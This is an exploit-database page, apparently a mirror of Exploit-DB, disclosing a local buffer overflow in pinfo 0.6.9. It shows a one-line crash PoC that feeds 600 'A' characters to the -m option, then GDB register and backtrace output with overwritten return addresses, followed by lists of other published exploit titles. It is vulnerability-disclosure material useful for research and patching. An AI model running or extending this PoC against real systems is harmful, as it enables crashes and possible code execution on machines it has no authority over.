Menu

Search for hundreds of thousands of exploits

"pinfo 0.6.9 - Local Buffer Overflow (PoC)"

Author

Exploit author

"Nassim Asrir"

Platform

Exploit platform

linux

Release date

Exploit published date

2017-04-18

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
# Title: pinfo v0.6.9 - Local Buffer Overflow
# Author: Nassim Asrir
# Researcher at: Henceforth
# Author contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
# CVE: N/A

# Download #

$ apt-get install pinfo

# POC #

For any Question or discussion about this vuln: https://www.facebook.com/asrirnassim/ 

$ pinfo -m `python -c 'print "A"*600'`
Przemek's Info Viewer v0.6.9
Looking for man page...

Caught signal 11, bye!
Segmentation fault


# GDB Output #

$ gdb pinfo

(gdb) r -m `python -c 'print "A"*600'`

Program received signal SIGSEGV, Segmentation fault.
__GI_getenv (name=0x7ffff79831aa "RM") at getenv.c:84
84	getenv.c: No such file or directory.

(gdb) info registers 
rax            0x54	84
rbx            0x4141414141414141	4702111234474983745   <==== 
rcx            0x1a8	424
rdx            0x10	16
rsi            0x7fffffffdaae	140737488345774
rdi            0x7ffff79831a8	140737347334568
rbp            0x7fffffffe0a8	0x7fffffffe0a8
rsp            0x7fffffffda90	0x7fffffffda90   
r8             0x0	0
r9             0x20	32
r10            0x1ec	492
r11            0x7ffff796c630	140737347241520
r12            0x4554	17748
r13            0x4	4
r14            0x2	2
r15            0x7ffff79831aa	140737347334570
rip            0x7ffff73c911d	0x7ffff73c911d <__GI_getenv+173>
eflags         0x10206	[ PF IF RF ]
cs             0x33	51
ss             0x2b	43
ds             0x0	0
es             0x0	0
fs             0x0	0
gs             0x0	0

(gdb) where
#0  __GI_getenv (name=0x7ffff79831aa "RM") at getenv.c:84
#1  0x00007ffff796c661 in initscr () from /lib/x86_64-linux-gnu/libncursesw.so.5
#2  0x000055555556214a in ?? ()
#3  0x000055555555f165 in ?? ()
#4  0x0000555555557552 in ?? ()
#5  0x4141414141414141 in ?? ()
#6  0x4141414141414141 in ?? ()
#7  0x4141414141414141 in ?? ()
#8  0x4141414141414141 in ?? ()
#9  0x4141414141414141 in ?? ()
#10 0x4141414141414141 in ?? ()
#11 0x4141414141414141 in ?? ()
#12 0x4141414141414141 in ?? ()
#13 0x4141414141414141 in ?? ()
#14 0x4141414141414141 in ?? ()
#15 0x4141414141414141 in ?? ()
#16 0x4141414141414141 in ?? ()
#17 0x4141414141414141 in ?? ()
#18 0x4141414141414141 in ?? ()
#19 0x4141414141414141 in ?? ()
#20 0x4141414141414141 in ?? ()
#21 0x4141414141414141 in ?? ()
#22 0x4141414141414141 in ?? ()
#23 0x4141414141414141 in ?? ()
#24 0x4141414141414141 in ?? ()
#25 0x4141414141414141 in ?? ()
#26 0x4141414141414141 in ?? ()
#27 0x4141414141414141 in ?? ()
#28 0x4141414141414141 in ?? ()
#29 0x4141414141414141 in ?? ()
#30 0x4141414141414141 in ?? ()
#31 0x4141414141414141 in ?? ()
#32 0x4141414141414141 in ?? ()
#33 0x4141414141414141 in ?? ()
#34 0x4141414141414141 in ?? ()
#35 0x4141414141414141 in ?? ()
#36 0x4141414141414141 in ?? ()
#37 0x4141414141414141 in ?? ()
#38 0x4141414141414141 in ?? ()
#39 0x4141414141414141 in ?? ()
#40 0x4141414141414141 in ?? ()
#41 0x00007fffffff0020 in ?? ()
#42 0x00007fffffffebaa in ?? ()
---Type <return> to continue, or q <return> to quit---
#43 0x00007fffffffebc2 in ?? ()
#44 0x00007fffffffebd6 in ?? ()
#45 0x00007fffffffebe1 in ?? ()
#46 0x00007fffffffec07 in ?? ()
#47 0x00007fffffffec18 in ?? ()
#48 0x00007fffffffec48 in ?? ()
#49 0x00007fffffffec52 in ?? ()
#50 0x00007fffffffec73 in ?? ()
#51 0x00007fffffffec7d in ?? ()
#52 0x00007fffffffec86 in ?? ()
#53 0x00007fffffffec91 in ?? ()
#54 0x00007fffffffeca4 in ?? ()
#55 0x00007fffffffecb7 in ?? ()
#56 0x00007fffffffeccc in ?? ()
#57 0x00007fffffffed08 in ?? ()
#58 0x00007fffffffed33 in ?? ()
#59 0x00007fffffffed58 in ?? ()
#60 0x00007fffffffed63 in ?? ()
#61 0x00007fffffffed74 in ?? ()
#62 0x00007fffffffed84 in ?? ()
#63 0x00007fffffffed8f in ?? ()
#64 0x00007fffffffedc3 in ?? ()
#65 0x00007fffffffeddc in ?? ()
#66 0x00007fffffffee0d in ?? ()
#67 0x00007fffffffee30 in ?? ()
#68 0x00007fffffffee3f in ?? ()
#69 0x00007fffffffee47 in ?? ()
#70 0x00007fffffffee59 in ?? ()
#71 0x00007fffffffee75 in ?? ()
#72 0x00007fffffffee82 in ?? ()
#73 0x00007fffffffeeb5 in ?? ()
#74 0x00007fffffffeed1 in ?? ()
#75 0x00007fffffffeeee in ?? ()
#76 0x00007fffffffef28 in ?? ()
#77 0x00007fffffffef97 in ?? ()
#78 0x0000000000000000 in ?? ()
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-11-27 "libupnp 1.6.18 - Stack-based buffer overflow (DoS)" dos linux "Patrik Lantz"
2020-11-24 "ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)" webapps linux "Giuseppe Fuggiano"
2020-10-28 "Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion" webapps linux "Ivo Palazzolo"
2020-10-28 "Blueman < 2.1.4 - Local Privilege Escalation" local linux "Vaisha Bernard"
2020-10-28 "aptdaemon < 1.1.1 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "PackageKit < 1.1.13 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-09-11 "Gnome Fonts Viewer 3.34.0 - Heap Corruption" local linux "Cody Winkler"
2020-07-10 "Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution" remote linux SpicyItalian
2020-07-06 "Grafana 7.0.1 - Denial of Service (PoC)" dos linux mostwanted002
Release Date Title Type Platform Author
2020-11-02 "Foxit Reader 9.7.1 - Remote Command Execution (Javascript API)" local windows "Nassim Asrir"
2020-01-13 "Microsoft Windows 10 build 1809 - Local Privilege Escalation (UAC Bypass)" local windows "Nassim Asrir"
2019-12-12 "Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC)" dos windows "Nassim Asrir"
2019-09-24 "Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection" webapps php "Nassim Asrir"
2019-09-11 "AVCON6 systems management platform - OGNL Remote Command Execution" webapps java "Nassim Asrir"
2019-08-16 "EyesOfNetwork 5.1 - Authenticated Remote Command Execution" webapps php "Nassim Asrir"
2018-09-10 "LW-N605R 12.20.2.1486 - Remote Code Execution" webapps hardware "Nassim Asrir"
2018-07-23 "Windows Speech Recognition - Buffer Overflow (PoC)" dos windows "Nassim Asrir"
2018-05-18 "Cisco SA520W Security Appliance - Path Traversal" webapps hardware "Nassim Asrir"
2018-02-13 "Advantech WebAccess 8.3.0 - Remote Code Execution" remote windows "Nassim Asrir"
2017-12-15 "ITGuard-Manager 0.0.0.1 - Remote Code Execution" webapps cgi "Nassim Asrir"
2017-07-11 "DataTaker DT80 dEX 1.50.012 - Information Disclosure" webapps hardware "Nassim Asrir"
2017-06-02 "reiserfstune 3.6.25 - Local Buffer Overflow" dos linux "Nassim Asrir"
2017-04-18 "pinfo 0.6.9 - Local Buffer Overflow (PoC)" dos linux "Nassim Asrir"
2017-04-15 "Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation" local linux "Nassim Asrir"
2017-03-27 "Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow" dos windows "Nassim Asrir"
2017-03-23 "wifirxpower - Local Buffer Overflow (PoC)" dos linux "Nassim Asrir"
2017-03-16 "Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow (PoC)" dos windows "Nassim Asrir"
2017-01-17 "Openexpert 0.5.17 - 'area_id' SQL Injection" webapps php "Nassim Asrir" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected